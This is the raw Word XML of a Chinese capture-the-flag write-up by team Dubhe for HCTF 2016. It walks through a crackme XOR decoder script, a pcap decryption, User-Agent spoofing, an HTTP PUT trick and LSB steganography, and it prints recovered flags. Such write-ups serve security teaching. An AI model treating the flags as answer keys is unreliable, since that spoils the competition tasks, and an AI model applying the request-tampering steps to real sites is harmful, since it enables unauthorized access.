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07A" w:rsidRDefault="0017707A" w:rsidP="0017707A">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0017707A" w:rsidRDefault="0017707A" w:rsidP="0017707A">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003807ED" w:rsidRPr="00311889" w:rsidRDefault="003807ED" w:rsidP="003807ED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 w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>天枢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>HCTF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>2016_WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017707A" w:rsidRDefault="0017707A" w:rsidP="0017707A">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0017707A" w:rsidRDefault="003807ED" w:rsidP="0017707A">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00311889">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20A935A4" wp14:editId="167BA3EE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>208280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9050400" cy="5115600"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="80"/>
                <wp:lineTo x="0" y="21557"/>
                <wp:lineTo x="19915" y="21557"/>
                <wp:lineTo x="19915" y="80"/>
                <wp:lineTo x="0" y="80"/>
              </wp:wrapPolygon>
            </wp:wrapTight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t="-1117" r="-8090" b="1117"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="9050400" cy="51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707A" w:rsidRDefault="0017707A" w:rsidP="0017707A">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0017707A" w:rsidRDefault="0017707A" w:rsidP="0017707A">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003807ED" w:rsidRDefault="003807ED" w:rsidP="0017707A">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0017707A" w:rsidRDefault="0017707A" w:rsidP="0017707A">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0017707A" w:rsidRDefault="0017707A" w:rsidP="0017707A">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0012558D" w:rsidRDefault="0012558D" w:rsidP="0012558D">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dubhe</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="0017707A" w:rsidRDefault="0017707A" w:rsidP="0017707A">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>2016/11/28</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C162A" w:rsidRPr="0035085D" w:rsidRDefault="00E14965" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc468128519"/>
      <w:r w:rsidRPr="0035085D">
        <w:lastRenderedPageBreak/>
        <w:t>==========</w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="0035085D">
        <w:t>Level1</w:t>
      </w:r>
      <w:r w:rsidRPr="0035085D">
        <w:t>==========</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="0035085D" w:rsidRDefault="008F0EAB" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc468128520"/>
      <w:r w:rsidRPr="0035085D">
        <w:t xml:space="preserve">0x01 </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="0035085D">
        <w:t>Web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="0035085D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>---我是个有理想的人，我就是去做Web也不做逆向！---逆向真好玩真好玩</w:t>
      </w:r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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://139.224.54.27/yixyi/Re50.exe</w:t>
        </w:r>
      </w:hyperlink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 w:cs="ArialRegular"/>
          <w:color w:val="254B70"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr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这道题不难，输入为20个字符，并对这20个字符打乱了一下顺序，然后和0xCC异或，异或完之后和check数组比较，唯一的一个坑点是check数组。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="101058C9" wp14:editId="5E2AD4FC">
            <wp:extent cx="3092609" cy="111130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ab/>
        <w:t>v18就是check数组，一开始没注意顺序，以为check数组就是从0x417480开始的20字节，但没想到这里给check数组赋值的时候打乱了一下顺序...难怪一直出不来</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r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ab/>
        <w:t>对输入打乱顺序的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C39A9B4" wp14:editId="3B303648">
            <wp:extent cx="3505380" cy="24004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ab/>
        <w:t>但好像这么一打乱顺序把本来输入的第二个字符搞没了。。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152E" w:rsidRPr="00764553" w:rsidTr="004C7D6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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#check = [0xb1,0xa4,0xb5,0x87,0xf9,0xb8,0xed,0xa4,0xfc,0xb8,0xff,0xb7,0xad,0xad,0x93,0xb9,0xbf,0xbf,0x93,0xfd]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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check = [0xb1,0xa4,0xb5,0x87,0xad,0xad,0x93,0xb9,0xbf,0xbf,0x93,0xfd,0xfc,0xb8,0xff,0xb7,0xf9,0xb8,0xed,0xa4]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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data = []</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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for i in range(0,20):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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 data.append(chr(check[i]^0xCC))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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print "".join(data)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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for i in range(0,20):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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 if(i==1 or i==3 or i==5 or i==7):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        data[i] = chr(ord(data[i])-2)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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print "".join(data)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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flag = ""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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flag = data[19]+" "+data[17]+data[1]+data[15]+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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    data[3]+data[13]+data[5]+data[11]+data[9]+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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    data[10]+data[8]+data[12]+data[6]+data[14]+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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    data[4]+data[16]+data[2]+data[18]+data[0]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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print flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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所以求出来的flag是这样的：</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>h tf{It_1s_s0_3a5y!}</w:t>
      </w:r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第二个字符就是c了</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r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 w:cs="ArialRegular" w:hint="eastAsia"/>
          <w:color w:val="254B70"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="0035085D" w:rsidRDefault="008F0EAB" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc468128521"/>
      <w:r w:rsidRPr="0035085D">
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="0035085D">
        <w:t>02</w:t>
      </w:r>
      <w:r w:rsidR="00036147" w:rsidRPr="0035085D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="0035085D">
        <w:t>杂项签到</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="0035085D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>你竟然背着我干……</w:t>
      </w:r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hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://139.224.54.27/webco1a/+_+.pcapng</w:t>
        </w:r>
      </w:hyperlink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 w:cs="ArialRegular"/>
          <w:color w:val="254B70"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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从流量包中可以获得密文和加解密脚本，把密文先base64 decode一下，然后用脚本跑下就好了。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 w:cs="ArialRegular" w:hint="eastAsia"/>
          <w:color w:val="254B70"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc468128522"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">03 </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>2099年的flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>only ios99 can get flag(Maybe you can easily get the flag in 2099</w:t>
      </w:r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hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://2099.hctf.io/</w:t>
        </w:r>
      </w:hyperlink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 w:cs="ArialRegular"/>
          <w:color w:val="254B70"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr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签到题，看到提示中写道ios99第一反应User</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69861FB9" wp14:editId="597BEA5A">
            <wp:extent cx="5274310" cy="881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对比几个UA后找到版本的字段，改成99后拿到flag。</w:t>
      </w:r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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01DA58FD" wp14:editId="309490AB">
            <wp:extent cx="5274310" cy="17887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2E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc468128523"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>encore time</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>要到了安可(encore)时间</w:t>
      </w:r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hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://docs.google.com/forms/d/e/1FAIpQLSd_jXAEcC_iKEuXvVwfRpnN4BHYkaTRUzR_YqejT4eaPajqlw/viewform</w:t>
        </w:r>
      </w:hyperlink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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>调查问卷题目=</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=不多说了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00E14965" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc468128524"/>
      <w:r w:rsidRPr="00764553">
        <w:t>==========</w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:t>==========</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc468128525"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>05</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>RESTFUL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>博丽神社赛钱箱</w:t>
      </w:r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hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://jinja.hctf.io/</w:t>
        </w:r>
      </w:hyperlink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根据提示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"Please &lt;PUT&gt; me some &lt;money&gt; more than &lt;12450&gt;!"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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用HTTP的PUT方法提交参数money大于12450的值可返回flag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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc468128526"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>06</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>pic again</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>教练，我想打CTF</w:t>
      </w:r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hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://139.224.54.27/fl4g/flag.png</w:t>
        </w:r>
      </w:hyperlink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题目给了flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.png</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，用神器steg</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>solve</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现LSB隐写，藏了一个zip文件，保存下来后将zip抠出来，发现里面有一个elf文件，在linux下运行就有flag了。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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc468128527"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>07</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>giligili</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t xml:space="preserve">ギリギリEYEo(*^▽^*)┛ </w:t>
      </w:r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hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://re4js.hctf.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F9152E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</w:p>
    <w:p w:rsidR="0004519E" w:rsidRPr="0004519E" w:rsidRDefault="0004519E" w:rsidP="0004519E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  <w:r w:rsidRPr="0004519E">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>做这道题我是靠灵性:)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004519E" w:rsidRPr="0004519E" w:rsidRDefault="0004519E" w:rsidP="0004519E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</w:p>
    <w:p w:rsidR="0004519E" w:rsidRDefault="0004519E" w:rsidP="0004519E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04519E">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
